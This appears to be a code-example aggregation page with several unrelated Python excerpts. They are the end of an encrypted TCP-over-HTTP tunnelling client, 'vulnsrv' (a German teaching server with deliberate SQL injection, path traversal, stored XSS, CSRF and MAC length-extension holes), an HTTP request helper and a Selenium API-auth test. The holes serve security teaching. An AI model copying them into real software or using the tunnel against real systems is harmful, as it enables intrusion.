					if conf.echoHTTPBody:
							outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
					response = []
					madeRequest = False
					httpRetryCount = 0
					while madeRequest == False:
						try:
							response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
							madeRequest = True
						except Exception as e:
							httpRetryCount += 1
							if httpRetryCount > httpRequestRetryLimit:
								outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request retry limit of %i has been reached, and this request will not be retried. Final error was: %s' % (httpRequestRetryLimit, e))
								madeRequest = True
							else:
								outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request failed with the following message: %s. This request will be retried up to %i times.' % (e, httpRequestRetryLimit))
								time.sleep(httpRequestRetryDelay)
					
					content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
					cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
					headers['Cookie'] = cookieVal
				except Exception as e:
					raise e
				
				serverClosedConnection = False
				
				try:
					srb = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
					#print '"' + srb + '"'
					srbArray = srb.split(" ", 1)
					fromServer = ""
					if len(srbArray) > 1:
						if srbArray[0] == conf.responseStringData:
							fromServerB64 = srbArray[1]
							fromServer = base64.b64decode(fromServerB64)
							if len(encryptionKey) > 0:
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, fromServerB64))
								fromServer = decrypt(fromServer, str(encryptionKey), encryptionBlockSize)
								#print '"' + fromServer + '"'
							else:
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, fromServerB64))							
							fullMessageSize = len(fromServer)
							numBlocks = int(math.ceil(float(fullMessageSize) / float(conf.clientBlockSizeLimitFromServer)))
							if conf.echoDebugMessages:
								if numBlocks > 1:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Splitting large block (%i bytes) into %i blocks for relay to client' % (fullMessageSize, numBlocks))
							for blockNum in range(0, numBlocks):
								firstByte = blockNum * conf.clientBlockSizeLimitFromServer
								lastByte = (blockNum + 1) * conf.clientBlockSizeLimitFromServer
								if lastByte > fullMessageSize:
									lastByte = fullMessageSize
								currentBlock = fromServer[firstByte:lastByte]
								serverSentByteCounter = serverSentByteCounter + len(currentBlock)
								if conf.echoData:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, base64.b64encode(currentBlock)))
								if conf.echoDebugMessages:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '(Block %i/%i) %i bytes' % (blockNum + 1, numBlocks, len(currentBlock)))
								try:
									clientsock.send(currentBlock)
								except Exception as e:
									outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error sending to client - %s' % (e))
								if conf.clientBlockTransmitSleepTime > 0.0:
									if blockNum < (numBlocks - 1):
										time.sleep(conf.clientBlockTransmitSleepTime)
					else:
						foundResponseType = False
						if srb == conf.responseStringNoData:
							foundResponseType = True
							if conf.echoDebugMessages:
								outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'No data to receive from server at this time')
						else:
							trafficSent = True
						if srb == conf.responseStringErrorInvalidRequest:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the request was invalid. Verify that that you are using a client configuration compatible with the server-side component.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionOpenFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the requested connection could not be opened. You may have requested a destination host/port that is inaccessible to the server, the server may have exhausted ephemeral ports (although this is unlikely), or another component (e.g. firewall) may be interfering with connectivity.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionSendFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while sending data over the TCP connection.')
							foundResponseType = True
						if srb == conf.responseStringErrorConnectionReceiveFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while receiving data over the TCP connection.')
							foundResponseType = True
						if srb == conf.responseStringErrorDecryptFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported a decryption failure. Verify that the encryption keys in the client and server configurations match.')
							foundResponseType = True
						if srb == conf.responseStringErrorEncryptFailed:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported an encryption failure. Verify that the encryption keys in the client and server configurations match.')
							foundResponseType = True
						if srb == conf.responseStringErrorEncryptionNotSupported:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that it does not support encryption. Verify that that you are using a client configuration compatible with the server-side component.')
							foundResponseType = True
						if foundResponseType == False:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Unexpected response from server: %s' % (content))
							serverClosedConnection = True
					
					if conf.responseStringConnectionClosed in content:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server explicitly closed connection ID %s' % (connectionID))
						serverClosedConnection = True
					if conf.responseStringErrorConnectionNotFound in content:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that connection ID %s was not found - assuming connection has been closed.' % (connectionID))
						serverClosedConnection = True				
				except socket.error as e:
					if "timed out" not in str(e):
						raise e
						
				if trafficSent:
					scaleSocketTimeoutDown = True
					scaleSocketTimeoutUp = False
				else:
					scaleSocketTimeoutDown = False
					scaleSocketTimeoutUp = True
					
				if serverClosedConnection == True:
					runChildLoop = 0
					closeConnections = 1
					try:
						responseArray = content.split(" ")
						if len(responseArray) > 1:
							connectionID = responseArray[1]
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s' % (connectionID))
						else:
							outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without specifying its ID' % (connectionID))
					except:
						outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without sending a response' % (connectionID))
						
				iterationCounter = iterationCounter + 1
				if iterationCounter > conf.statsUpdateIterations:
					outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (clientSentByteCounter))
					outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (serverSentByteCounter))
					iterationCounter = 0
					clientSentByteCounter = 0
					serverSentByteCounter = 0
					
				if runServer == 0:
					outputHandler.outputMessage('Server shutdown request received in thread for connection ID %s' % (connectionID))
					runChildLoop = 0
					closeConnections = 1
				else:
					if conf.autoscaleClientSocketTimeout:
						# scale socket timeout up/down if the criteria for doing so was met
						timeoutChange = 0.0
						#global socketTimeoutCurrent
						newSocketTimeout = socketTimeoutCurrent
						if scaleSocketTimeoutDown or scaleSocketTimeoutUp:
							timeoutChange = conf.clientSocketTimeoutScalingMultiplier * socketTimeoutCurrent
						if scaleSocketTimeoutDown:
							newSocketTimeout = conf.clientSocketTimeoutMin
						if scaleSocketTimeoutUp:
							newSocketTimeout = socketTimeoutCurrent + timeoutChange
						# make sure socket timeout is within specified range
						if newSocketTimeout < conf.clientSocketTimeoutMin:
							newSocketTimeout = conf.clientSocketTimeoutMin
						if newSocketTimeout > conf.clientSocketTimeoutMax:
							newSocketTimeout = conf.clientSocketTimeoutMax
						if newSocketTimeout != socketTimeoutCurrent:
							if conf.echoDebugMessages:
								outputHandler.outputMessage('[Connection ID %s]: Client-side socket timeout has been changed from %f to %f' % (connectionID, socketTimeoutCurrent, newSocketTimeout))
							socketTimeoutCurrent = newSocketTimeout
							
						# apply random socket timeout variation
						timeoutVar = random.uniform(clientSocketTimeoutVariationNeg, conf.clientSocketTimeoutVariation)
						timeoutModifier = (socketTimeoutCurrent * timeoutVar)
						effectiveTimeout = (socketTimeoutCurrent + timeoutModifier)
						if conf.echoDebugMessages:
							outputHandler.outputMessage('[Connection ID %s]: Applying random variation of %f to client-side socket timeout for this iteration - timeout will be %f' % (connectionID, timeoutModifier, effectiveTimeout))
							
						clientsock.settimeout(effectiveTimeout)
					

		except Exception as e:
			outputHandler.outputMessage('Connection-level exception: %s in thread for tunnel (%s -> %s -> %s)' % (e, formattedClientAddress, listeningAddress, formattedServerAddress))
			closeConnections = 1
			runChildLoop = 0
		if closeConnections == 1:
			outputHandler.outputMessage('Disengaging tunnel (%s -> %s -> %s)' % (formattedClientAddress, listeningAddress, formattedServerAddress))
			outputHandler.outputMessage('Closing client socket (%s -> %s)' % (formattedClientAddress, listeningAddress))
			try:
				clientsock.shutdown(1)
				clientsock.close()
			except Exception as e2:
				outputHandler.outputMessage('Exception while closing client socket (%s -> %s): %s' % (formattedClientAddress, listeningAddress, e2))
			plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
			if len(encryptionKey) > 0:
				#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
				ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
				if conf.accessKeyMode == "header":
					body = {conf.paramNameEncryptedBlock: ciphertextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }

			else:
				#body = {conf.paramNameOperation: conf.opModeStringCloseConnection, conf.paramNameConnectionID: connectionID }
				plaintextMessage = base64.b64encode(plaintextMessage)
				if conf.accessKeyMode == "header":
					body = {conf.paramNamePlaintextBlock: plaintextMessage }
				else:
					body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
			
			http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
			response, content = http.request(forwardingURL, 'POST', headers=headers, body=urllib.urlencode(body))
			content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
			cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
			headers['Cookie'] = cookieVal
			if conf.responseStringConnectionClosed in content:
				responseArray = content.split(" ")
				if len(responseArray) > 1:
					connectionID = responseArray[1]
					outputHandler.outputMessage('Server closed connection ID %s' % (connectionID))
			else:
				outputHandler.outputMessage('Error: could not close connection ID %s (may have already been closed on the server). Raw server response: %s' % (connectionID, content))
		else:
			outputHandler.outputMessage("Unexpected state: child loop exited without closeConnections being set to 1")

	except Exception as bigE:
		outputHandler.outputMessage("High-level exception: %s" % (str(bigE)))

Example 21

Project: vulnsrv
Source File: vulnsrv.py
View license
    def do_GET(self):
        reqp = _urlparse(self.path)
        try:
            getParams = query2dict(reqp.query.encode('ascii'))
        except ValueError:
            _type, e, _traceback = sys.exc_info()
            self.send_error(400, 'Invalid query format: ' + str(e))
            return
        sessionID = self._getSessionID()

        if reqp.path == '/':
            self._writeHtmlDoc(_uc('''
<ol class="mainMenu">
<li><a href="clientauth/">Client-Side Authorization Check</a></li>
<li><a href="mac/">MAC Length Extension</a></li>
<li><a href="csrf/">Cross-Site Request Forgery (CSRF)</a></li>
<li><a href="reflected_xss/?username=Benutzer%21">Reflected Cross-Site Scripting (XSS)</a></li>
<li><a href="stored_xss/?username=Benutzer%21">Stored Cross-Site Scripting (XSS)</a></li>
<li><a href="sqlinjection/">SQL Injection</a></li>
<li><a href="pathtraversal/">Path Traversal</a></li>
</ol>'''), 'vulnsrv', sessionID)
        elif reqp.path == '/clientauth/':
            js_code = html.escape('if (\'you\' != \'admin\') {alert(\'Zugriff verweigert!\'); return false;} else return true;', True)
            self._writeHtmlDoc(
                _uc('''
    <p>Finden Sie das Geheimnis heraus!</p>

    <form action="secret" method="post">
    <input type="submit" value="Geheimnis herausfinden"
    onclick="%s" />
    %s
    </form>
    ''') % (js_code, self._getCsrfTokenField(sessionID)),
                'Client-Side Authorization Check', sessionID)
        elif reqp.path == '/csrf/':
            self._writeHtmlDoc(
                _uc('''
<p>Mit dem untenstehendem Formular k&ouml;nnen Sie Nachrichten schreiben.
Erstellen Sie eine HTML-Datei <code>evil-csrf.html</code>, bei deren Aufruf der arglose Benutzer hier unfreiwillig eine &uuml;belgesinnte Nachricht hinterl&auml;sst.
</p>

<form action="send" enctype="application/x-www-form-urlencoded" method="post">
<input type="text" name="message" autofocus="autofocus" required="required" placeholder="Eine freundliche Nachricht" size="50" />
<input type="submit" value="Senden" />
</form>
''') + msgsToHtml(self.vulnState.csrfMessages), 'CSRF', sessionID)
        elif reqp.path == '/reflected_xss/':
            username = getParams.get('username', 'Unbekannter')
            self._writeHtmlDoc(_uc(
                '''<div>Hallo %s</div>
<p>Das untenstehende Formular ist gegen Cross-Site Request Forgery gesch&uuml;tzt.
Erstellen Sie eine HTML-Datei <code>evil-reflected-xss.html</code>, bei deren Aufruf der arglose Benutzer hier trotzdem unfreiwillig eine &uuml;belgesinnte Nachricht hinterl&auml;sst.
</p>

<form action="send" enctype="application/x-www-form-urlencoded" method="post">
<input type="text" name="message" autofocus="autofocus" required="required" placeholder="Eine freundliche Nachricht" size="50" />
%s
<input type="submit" value="Senden" />
</form>
''') % (_uc(username), self._getCsrfTokenField(sessionID)) + msgsToHtml(self.vulnState.reflected_xss_messages), 'Reflected XSS', sessionID)
        elif reqp.path == '/stored_xss/':
            self._writeHtmlDoc(_uc(
                '''<div>Hallo <span class="userid">%s</span></div>
<p>Das untenstehende Formular ist gegen Cross-Site Request Forgery gesch&uuml;tzt.
Sorgen Sie daf&uuml;r, dass jeder Benutzer der diese Seite aufruft unfreiwillig eine Nachricht hinterl&auml;sst, die IP und Port des Benutzers beinhaltet.
</p>

<form action="send" enctype="application/x-www-form-urlencoded" method="post">
<input type="text" name="message" autocomplete="off" autofocus="autofocus" required="required" placeholder="Eine freundliche Nachricht" size="50" />
%s
<input type="submit" value="Senden" />
</form>
%s

<script>
function show(messages_json) {
    var messages = JSON.parse(messages_json);
    var list = document.querySelector('.messages');
    messages.forEach(function(m) {
        var li = document.createElement('li');
        li.appendChild(document.createTextNode(m));
        list.appendChild(li);
    });
}

function download() {
    var xhr = new XMLHttpRequest();
    xhr.dataType = 'text';
    xhr.onload = function(e) {
        show(xhr.responseText);
    };
    xhr.open('GET', 'json');
    xhr.send();
}

function send(msg) {
    var xhr = new XMLHttpRequest();
    var token = document.querySelector('input[name="csrfToken"]').value;
    var params = 'csrfToken=' + encodeURIComponent(token) + '&message=' +encodeURIComponent(msg);
    xhr.open('POST', 'send');
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.send(params);

}

function user() {
    return document.querySelector('.userid').textContent;
}
</script>

<script>
// JSON direkt einbinden
var messages_json = '%s';
show(messages_json);

// Vorheriger Code:
// download();

</script>

<form action="clear" enctype="application/x-www-form-urlencoded" method="post">
%s
<button role="submit">Alle Nachrichten l&ouml;schen</button
</form>

''') % (_uc(':').join(map(_uc, self.client_address)), self._getCsrfTokenField(sessionID), msgsToHtml([]), json.dumps(self.vulnState.stored_xss_messages), self._getCsrfTokenField(sessionID)), 'Stored XSS', sessionID)
        elif reqp.path == '/sqlinjection/':
            webMessages = self.vulnState.sqlQuery("SELECT id,msg FROM messages WHERE user='web'")
            self._writeHtmlDoc(_uc('''
<p>In der untenstehenden Tabelle sehen Sie die Nachrichten an den Benutzer <code>web</code>. Welche Nachrichten hat der Benutzer <code>admin</code> bekommen?</p>

<h2>Nachrichten an <code>web</code></h2>

<ul class="messages">
%s
</ul>''') % '\n'.join('<li><a href="/sqlinjection/msg?id=' + html.escape(str(row[0])) + '">' + html.escape(row[1]) + '</a></li>' for row in webMessages), 'SQL Injection', sessionID)
        elif reqp.path == '/sqlinjection/msg':
            msgNum = getParams.get('id', '')
            sql = "SELECT id,user,msg FROM messages WHERE user='web' AND id='" + msgNum + "'"
            try:
                msgs = self.vulnState.sqlQuery(sql)
                if len(msgs) == 0:
                    msg_html = '<td colspan="3">Keine web-Nachrichten gefunden</td>'
                else:
                    msg_html = '\n'.join('<tr>' + ''.join('<td>' + html.escape(str(cell)) + '</td>' for cell in row) + '</tr>' for row in msgs)
            except:
                _type, e, _traceback = sys.exc_info()
                msg_html = '<td colspan="3" class="error">' + html.escape(str(e)) + '</td>'
            self._writeHtmlDoc(('''
<table class="messages">
<thead><tr><th>ID</th><th>Benutzer</th><th>Nachricht</th></tr></thead>
%s
</table>
<p><a href="/sqlinjection/">Zur&uuml;ck zur &Uuml;bersicht</a></p>
''' % msg_html), 'Detailansicht: Nachricht ' + msgNum, sessionID)
        elif reqp.path == '/pathtraversal/':
            fileHtml = _uc('').join(
                _uc('<li><a href="get?') + html.escape(urlencode([('file', fn)])) + _uc('">') + html.escape(fn) + _uc('</a></li>\n')
                for fn in FILES['/var/www/img']['content'])
            self._writeHtmlDoc(_uc('''
<p>Welchen Unix-Account sollte ein Angreifer n&auml;her untersuchen?</p>

<p><em>Bonus-Aufgabe</em>: Was ist das Passwort des Accounts?</p>

<p>Dateien zum Download:</p>

<ul>
%s
</ul>''' % fileHtml), 'Path Traversal', sessionID)
        elif reqp.path == '/pathtraversal/get':
            fn = '/var/www/img/' + getParams.get('file', '')
            # Resolve the path.
            # If we were using a real filesystem, this would be done automatically by the OS filesystem functions, of course
            curPath = []
            for pel in fn.split('/'):
                if pel == '' or pel == '.':
                    continue
                if pel == '..':
                    if len(curPath) > 0:
                        curPath.pop()
                    # else: We're at the root, and /../ is /
                else:
                    curPath.append(pel)
            finalPath = '/' + '/'.join(curPath)
            if finalPath.endswith('/'):
                finalPath = finalPath[:-1]
            if finalPath in FILES:
                fdata = FILES[finalPath]
                if fdata['type'] == '__directory__':
                    self.send_error(404, 'Is a directory')
                else:
                    fileBlob = base64.b64decode(fdata['blob_b64'].encode('ascii'))
                    self.send_response(200)
                    self.send_header('Content-Type', fdata['type'])
                    self.send_header('Content-Length', str(len(fileBlob)))
                    self.end_headers()
                    self.wfile.write(fileBlob)
            else:
                self.send_error(404)
        elif reqp.path == '/mac/':
            cookies = self._readCookies()
            raw_cookie = cookies.get('mac_session')
            if raw_cookie is not None:
                if isinstance(raw_cookie, compat_bytes):  # Python 2.x
                    raw_cookie = raw_cookie.decode('latin1')
                mac, _, session_data_str = raw_cookie.rpartition(_uc('!'))
                session_data = session_data_str.encode('latin1')
                secret = self.vulnState.macSecret
                if hashlib.sha256(secret + session_data).hexdigest() == mac:
                    session = query2dict(session_data)
                    user = session['user']
                    timestamp = session['time']
                else:
                    user = timestamp = _uc('(Falscher MAC)')
            else:
                raw_cookie = _uc('')
                user = timestamp = _uc('(Nicht gesetzt)')

            assert isinstance(raw_cookie, _uc)
            raw_cookie_hex = binascii.b2a_hex(raw_cookie.encode('utf-8')).decode('ascii')
            assert isinstance(raw_cookie_hex, _uc)
            self._writeHtmlDoc(_uc('''
<p>Loggen Sie sich als Benutzer admin ein (ohne das Geheimnis aus dem Server-Prozess auszulesen).
Schreiben Sie daf&#x00fc;r ein Programm, das den korrekten Cookie-Wert berechnet.</p>

<form method="post" action="login">
%s
<input type="submit" value="Gast-Login" />
</form>

<h3>Aktuelle Session-Daten:</h3>

<p>Cookie (roh): <code>%s</code> (%s Bytes)</p>

<dl>
<dt>Benutzername:</dt><dd>%s</dd>
<dt>Login-Zeit:</dt><dd>%s</dd>
</dl>

<p>F&#x00fc;r den Angriff k&#x00f6;nnen Sie <a href="mac_attack.py">dieses Python-Skript</a> verwenden.
Das Skript erwartet, dass im lokalen Verzeichnis eine ausf&#x00fc;hrbare Datei ./mac_extension liegt, die mit den Argumenten <code>[Bekannter Hash]</code> <code>[Bekannte Eingabe]</code> <code>[Einzuf&#x00fc;gende Daten]</code> <code>[L&#x00e4;nge des secrets in Bytes (32)]</code> aufgerufen werden kann und das exploit zur&#x00fc;ckgibt.
</p>
      ''' % (
                self._getCsrfTokenField(sessionID),
                html.escape(raw_cookie),
                html.escape(_uc(len(raw_cookie))),
                html.escape(user),
                html.escape(timestamp)
            )), 'Length Extension-Angriffe gegen MAC', sessionID)
        elif reqp.path == '/mac/mac_attack.py':
            fdata = FILES['/mac/mac_attack.py']
            fileBlob = base64.b64decode(fdata['blob_b64'].encode('ascii'))
            self.send_response(200)
            self.send_header('Content-Type', fdata['type'])
            self.send_header('Content-Length', str(len(fileBlob)))
            self.end_headers()
            self.wfile.write(fileBlob)
        elif reqp.path == '/favicon.ico':
            self.send_response(200)
            self.send_header('Content-Type', 'image/png')
            self.send_header('Content-Length', str(len(FAVICON)))
            self.end_headers()
            self.wfile.write(FAVICON)
        elif reqp.path == '/stored_xss/json':
            self._write_json(self.vulnState.stored_xss_messages)
        else:
            self.send_error(404)

Example 22

Project: SmartThings-Alfred
Source File: request.py
View license
    def __init__(self, url, **kwargs):
        self.request = None
        self.response = None
        self.code = -1
        self.info = {}
        self.cookieJar = None
        self.reason = ''

        data = kwargs.get('data', None)
        if data:
            if isinstance(data, dict):
                data = urllib.urlencode(data)
            if not isinstance(data, basestring):
                data = None
                raise ValueError('data must be string or dict')

        request_type = kwargs.get('type', 'POST')
        if data and isinstance(request_type, basestring) and request_type.upper()!='POST':
            url = '{}?{}'.format(url, data)
            data = None # GET data must be None

        self.request = urllib2.Request(url, data)

        # referer
        referer = kwargs.get('referer', None)
        if referer:
            self.request.add_header('referer', referer)

        # user-agent
        user_agent = kwargs.get('user_agent', None)
        if user_agent:
            self.request.add_header('User-Agent', user_agent)

        # auth
        auth = kwargs.get('auth', None)
        if auth and isinstance(auth, dict) and auth.has_key('usr'):
            auth_string = base64.b64encode('{}:{}'.format(auth.get('usr',''), auth.get('pwd','')))
            self.request.add_header('Authorization', 'Basic {}'.format(auth_string))  

        # cookie
        cookie = kwargs.get('cookie', None)
        cj = None
        if cookie:
            if isinstance(cookie, CookieJar):
                cj = cookie
            elif isinstance(cookie, dict):
                result = []
                for k, v in cookie.iteritems():
                    result.append('{}={}'.format(k, v))
                cookie = '; '.join(result)
            elif isinstance(cookie, Cookie.BaseCookie):
                cookie = cookie.output(header='')
            if isinstance(cookie, basestring):
                self.request.add_header('Cookie', cookie)
        if cj is None:
            cj = CookieJar()

        #! TODO: proxy


        # build opener
        debuglevel = 1 if kwargs.get('debug', False) else 0
        opener = urllib2.build_opener(
            urllib2.HTTPHandler(debuglevel=debuglevel),
            urllib2.HTTPSHandler(debuglevel=debuglevel),
            urllib2.HTTPCookieProcessor(cj)
            )

        # timeout
        timeout = kwargs.get('timeout')
        if not isinstance(timeout, int):
            timeout = _DEFAULT_TIMEOUT

        try:
            self.response = opener.open(self.request, timeout=timeout)
            self.code = self.response.getcode()
            self.header = self.response.info().dict
            self.cookieJar = cj
        except urllib2.HTTPError, e:
            self.code = e.code
            self.reason = '{}'.format(e)
            raise e
        except urllib2.URLError, e:
            self.code = -1
            self.reason = e.reason
            raise e
        except Exception, e:
            self.code = -1
            self.reason = '{}'.format(e)
            raise e

Example 23

View license
    def test_json_api_auth(self):
        # Harold wants to make sure that people only have JSON access to his sheets
        # when he has explicitly granted it.

        # * He logs in to Dirigible and creates a new sheet
        sheet_id = self.login_and_create_new_sheet()
        base_json_url = urljoin(self.browser.current_url, 'v0.1/json/')

        # * He enters some values and formulae
        self.enter_cell_text(1, 1, '5')

        # * He tries to use an API call to get the sheet as JSON, but gets a 403 error.
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url)
        self.assertEquals(mngr.exception.code, 403)

        # * Looking around at the sheet page, he notices a "Security" button.
        self.wait_for_element_to_appear('id=id_security_button')

        # * He sees that the mouseover text on the button indicates that the JSON API is not enabled
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        # * He clicks the button.
        self.selenium.click('id=id_security_button')

        # * A dialog appears; there is an unchecked toggle saying "Allow JSON API access"
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.wait_for_element_visibility('id=id_security_form_json_enabled_checkbox', True)
        self.wait_for_element_visibility('id=id_security_form_json_api_key', True)
        self.wait_for_element_visibility('id=id_security_form_json_api_url', True)

        self.assertFalse(self.is_element_enabled('id_security_form_json_api_key'))
        self.assertFalse(self.is_element_enabled('id_security_form_json_api_url'))

        self.assertEquals(
            self.get_text('css=label[for="id_security_form_json_enabled_checkbox"]'),
            'Allow JSON API access'
        )
        self.assertEquals(self.selenium.get_value('id=id_security_form_json_enabled_checkbox'), 'off')

        # * ... and OK and Cancel buttons
        self.wait_for_element_visibility('id=id_security_form_ok_button', True)
        self.wait_for_element_visibility('id=id_security_form_cancel_button', True)

        # * He checks it.  He notices a textbox giving him an "API key",
        self.selenium.click('id=id_security_form_json_enabled_checkbox')
        self.assertTrue(self.is_element_enabled('id_security_form_json_api_key'))
        api_key = self.selenium.get_value('id=id_security_form_json_api_key')
        api_url = self.selenium.get_value('id=id_security_form_json_api_url')

        # * He also notices that when he clicks on the URL text field, the entire field is selected
        ## The focus call is to appease Chrome
        self.selenium.focus('id=id_security_form_json_api_url')
        self.selenium.click('id=id_security_form_json_api_url')

        # our 'caret' plugin appears to have a problem getting the selection
        # range for fields that are not editable, such as the json api url.
        # Consequently, we have to check the selection by copying this
        # text, and checking the clipboard content.
        with self.key_down(key_codes.CTRL):
            self.human_key_press(key_codes.LETTER_C)

        def get_clipboard_text():
            OpenClipboard()
            text = GetClipboardData(win32con.CF_TEXT)
            CloseClipboard()
            return text

        self.wait_for(
            lambda: get_clipboard_text() == api_url,
            lambda: 'bad clipboard text, was: %s' % (get_clipboard_text(),)
        )

        # * nothing appears outside the JSON API dialog box yet though.
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        # * He ignores all of the key stuff, presses Cancel
        self.selenium.click('id=id_security_form_cancel_button')

        # * He notices that the form disappears and that the icon still indicates that the JSON API is disabled
        self.wait_for_element_visibility('id=id_security_form', False)
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API disabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        # but he just tries accessing the JSON URL without a key again
        # * He gets 403 again.
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url)
        self.assertEquals(mngr.exception.code, 403)

        # * and he also gets 403 when he uses the API Key that was displayed
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url, urlencode({'api_key': api_key}))
        self.assertEquals(mngr.exception.code, 403)

        # * He half-realises what the problem is, opens the dialog again, checks the box, and presses OK
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.assertEquals(self.selenium.get_value('id=id_security_form_json_enabled_checkbox'), 'off')
        self.selenium.click('id=id_security_form_json_enabled_checkbox')
        self.assertTrue(self.is_element_enabled('id_security_form_json_api_key'))
        self.assertTrue(self.is_element_enabled('id_security_form_json_api_url'))
        api_url = self.selenium.get_value('css=#id_security_form_json_api_url')
        self.selenium.click('id=id_security_form_ok_button')
        self.wait_for_element_visibility('id=id_security_form', False)

        #* He now sees the toolbar indicates that the JSON API is enabled for this sheet
        self.assertTrue(
            'JSON API enabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API enabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        # * Not trusting the memory of his browser, he opens the dialog again
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.assertEquals(self.selenium.get_value('id=id_security_form_json_enabled_checkbox'), 'on')

        # * and immediately presses Cancel
        self.selenium.click('id=id_security_form_cancel_button')

        # * He is surprised and delighted to see that his sheet is still JSON-enabled
        self.assertTrue(
            'JSON API enabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )
        self.assertTrue(
            'JSON API enabled' in
            self.selenium.get_attribute('css=#[email protected]')
        )

        expected_url = "%s%s?api_key=%s" % (
            self.selenium.browserURL[:-1],
            urlparse(Url.api_url(self.get_my_username(), sheet_id)).path,
            api_key
        )
        self.assertEquals(api_url, expected_url)

        # .. despite this helpful link, he tries again with the wrong API key
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url, urlencode({'api_key': 'abcd1234-123dfe'}))
        # * He gets a 403
        self.assertEquals(mngr.exception.code, 403)


